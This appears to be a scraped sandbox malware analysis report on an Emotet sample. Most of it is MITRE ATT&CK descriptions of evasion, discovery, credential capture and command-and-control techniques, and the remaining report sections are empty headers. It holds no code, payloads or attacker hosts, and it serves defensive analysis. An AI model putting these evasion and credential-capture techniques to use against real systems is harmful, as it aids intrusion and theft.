Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ALNgwfVtrB

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 00D4EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Function 00D5061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre